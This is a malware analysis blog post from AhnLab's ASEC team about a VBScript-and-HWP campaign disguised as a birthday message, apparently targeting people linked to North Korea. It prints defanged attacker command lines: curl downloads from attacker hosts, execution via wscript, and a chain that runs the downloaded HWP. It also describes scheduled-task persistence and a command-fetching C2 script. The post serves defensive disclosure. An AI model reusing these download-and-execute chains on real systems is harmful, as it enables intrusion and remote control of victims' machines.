Malicious HWP File Disguised as a Happy Birthday Message (OLE Object)

The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The distribution path of malware is yet to be determined, but the VBScript is downloaded through curl.

The commands discovered so far are as follows:

  • curl  -H \”user-agent: chrome/103.0.5060.134 safari/537.32\” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp
  • cmd /c cd > %appdata%\\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\\vbtemp

Both commands save scripts in the %APPDATA% folder as vbtemp. As shown below, hxxp://datkka.atwebpages[.]com/2vbs contains VBScript codes that perform features such as registering to task scheduler and downloading additional files.

Figure 1. Script found in hxxp://datkka.atwebpages[.]com/2vbs

The downloaded vbtemp file is run through the wscript  //e:vbscript //b %APPDATA%\vbtemp command. In order for the script to be executed properly, a tmp~pth file must exist in the %APPDATA% folder. Although the tmp~pth file has not been found, it is likely that the APPDATA folder path is saved in it.

When the vbtemp file is executed, it downloads the HWP file via the curl command and refers to the path saved in the %APPDATA%\tmp~pth file to save the HWP file in the path as 1.hwp before executing it. The command executed in this process is as follows.

cmd /c  curl -H “User-Agent: Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) hrome/53.0.3027.64 Safari/537.32” hxxps://bigfile.mail.naver[.]com/download?fid=adR0Wz+5+BKjK3YXKoF0KxuXKAElKxujKogZKog/KoUwKAUdFAujKxMrKqbXKoKla3YlFxUmaxUmF4J4pztrpAUqMxM/K6FCK4M9KqpvpovwMm== -o [Path saved in \tmp-pth]\ 1.hwp && [Path saved in \tmp-pth]\1.hwp
Command 1 executed in vbtemp

Afterward, like the process above, the curl command is used to download an additional script. The downloaded script is saved as %APPDATA%\Microsoft\Windows\Themes\TransWallpaper. Furthermore, the 1.hwp file that was downloaded earlier is executed once more.

cmd /c curl -H “User-Agent: Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/53.0.3027.64 Safari/537.32” hxxp://datkka.atwebpages[.]com/mal -o  %APPDATA%\Microsoft\Windows\Themes\TransWallpaper && [Path saved in \tmp-pth]\1.hwp
Command 2 executed in vbtemp
Figure 2. Script found in hxxp://datkka.atwebpages[.]com/mal

The created TransWallpaper file is registered in the task scheduler, enabling the script to be executed every 30 minutes.

Figure 3. Created task scheduler

This script file executes additional commands received from hxxp://datkka.atwebpages[.]com/down.php. The “cmd /c calc” command below is received at the moment, but the command can be modified by the attacker, and in this case, various malicious behaviors can be performed.

Figure 4. Response from hxxp://datkka.atwebpages[.]com/down.php

The HWP file that was saved as 1.hwp earlier creates HappyBirthday.vbs in the %temp% folder upon execution.

The HWP file contains a link written with a relative path. When the user clicks the link, the ..\AppData\Local\Temp\HappyBirthday (2).vbs file is executed. It appears that the file executed here is named HappyBirthday (2).vbs, because the 1.hwp file is executed twice upon script execution. When the user simply clicks and opens the HWP file, the malicious behavior is not performed because the dropped HappyBirthday.vbs file name does not match.

Figure 5. HWP file
Figure 6. HWP file information

As can be seen in [Figure 6], the author of the HWP file is found to be a ‘Korean Peninsula Peace Education Platform,’ and it appears that it was created to target individuals with connections to North Korea.

The HappyBirthday.vbs file dropped and executed by the HWP file accesses hxxps://driver.googledocs.cloudns[.]nz/Yb/yb and downloads an additional script before saving it to %appdata%\tmp~1 and executing it.

curl -k -H “”User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36″” hxxps://driver.googledocs.cloudns[.]nz/Yb/yb -o %appdata%\tmp~1 & wscript.exe //e:vbscript //b %appdata%\tmp~1
HappyBirthday.vbs execution commands

As hxxps://driver.googledocs.cloudns[.]nz/Yb/yb cannot be currently accessed, the team could not find out what the file does after. However, various malicious commands can be executed depending on the intentions of the attacker, .

The exact distribution path of the malware is yet to be identified, but as it uses a variety of files, user discretion is advised. Users should refrain from executing files from unknown sources and update V3 and applications they use to the latest version.

[File Detection]

7c38b40ec19609f32de2a70d409c38b0 (vbs)
60d117f5cb7b0f8133967ec535c85c6a (vbs)
d86d57c1d8670d510e7b7a1ad7db9fd2 (vbs)
6083a1af637d9dd2b2a16538a17e1f45 (hwp)
ca2917006eb29171c9e5f374e789f53a (vbs)

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

Tagged as:,

0 0 votes
Article Rating
Notify of

Inline Feedbacks
View all comments